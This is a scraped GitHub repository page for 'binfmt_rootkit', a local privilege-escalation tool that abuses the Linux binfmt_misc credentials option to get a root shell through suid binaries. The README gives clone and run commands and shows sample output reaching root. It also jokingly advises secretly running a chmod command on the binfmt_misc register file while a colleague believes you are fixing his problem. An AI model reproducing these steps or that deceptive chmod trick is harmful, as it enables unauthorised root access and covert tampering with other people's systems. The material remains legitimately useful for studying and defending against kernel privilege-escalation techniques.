Skip to content
/ binfmt_misc Public

Kernel Support for miscellaneous (your favourite) exploits

License

GPL-3.0 license
22 stars 7 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

toffan/binfmt_misc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
LICENSE
LICENSE
 
 
README.rst
README.rst
 
 
binfmt_rootkit
binfmt_rootkit
 
 

Repository files navigation

binfmt_misc

Kernel Support for miscellaneous (your favourite) exploits

No breakthrough here, just some trivia involving binary formats.

binfmt_rootkit

Poor man's rootkit, leverage binfmt_misc's credentials option to escalate privilege through any suid binary (and to get a root shell) if /proc/sys/fs/binfmt_misc/register is writeable.

$ git clone https://github.com/plcp/binfmt_misc
$ cd binfmt_misc
$ ./binfmt_rootkit --help
Usage: ./binfmt_rootkit
    Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
    note that it must be enforced by any other mean before your try this, for
    example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave
    is thinking that you are fixing his problem.

Cheap nobody to root is cheap:

$ sudo -u nobody ./binfmt_rootkit
uid=0(root) euid=0(root)
sh-4.4#

Tested on Linux 4.9.6-1 and working with major distributions.

About

Kernel Support for miscellaneous (your favourite) exploits

Resources

Readme

License

GPL-3.0 license
Activity

Stars

22 stars

Watchers

2 watching

Forks

7 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages